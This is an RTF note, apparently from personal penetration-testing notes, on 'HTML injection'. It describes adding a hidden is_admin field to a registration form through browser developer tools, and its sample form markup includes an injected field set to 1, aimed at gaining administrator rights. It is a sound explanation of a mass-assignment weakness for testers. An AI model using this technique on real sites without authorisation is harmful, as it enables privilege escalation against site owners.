{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;\red255\green0\blue0;}
\paperw11900\paperh16840\margl1440\margr1440\vieww18080\viewh10460\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\b\fs32 \cf0 \ul \ulc0 HTML Injection\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\b0 \cf0 \ulnone \
You can add/remove things from an HTML page using for example Developer Add-on or Firebug.\
\
If there is a register page that shows only the username and password fields, but you know that the page has more (like a is_admin field) you can go on and add it to check what happens or if you can get admin privileges\
\
E.X.\

\f1\fs24 \cf2 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 \
\pard\pardeftab720\sl280\partightenfactor0
\cf2   <div class="control-group">\
    <label class="control-label" for="user_name">Name</label>:\
    <div class="controls">\
      <input id="user_name" name="user[name]" size="30" type="text" />\
    </div>\
  </div>\
\
  <div class="control-group">\
    <label class="control-label" for="user_username">Username</label>:\
    <div class="controls">\
      <input id="user_username" name="user[username]" size="30" type="text" />\
    </div>\
  </div>\
\
  <div class="control-group">\
    <label class="control-label" for="user_password">Password</label>:\
    <div class="controls">\
      <input id="user_password" name="user[password]" size="30" type="password" />\
    </div>\
  </div>\
  \cb3   <div class="control-group">\
    <label class="control-label" for="user_is_admin">is_admin</label>:\
    <div class="controls">\
      <input id=\'93is_admin\'94 name="user[is_admin]" size="30" type="text" value="1" />\
    </div>\
  </div>\cb1 \
}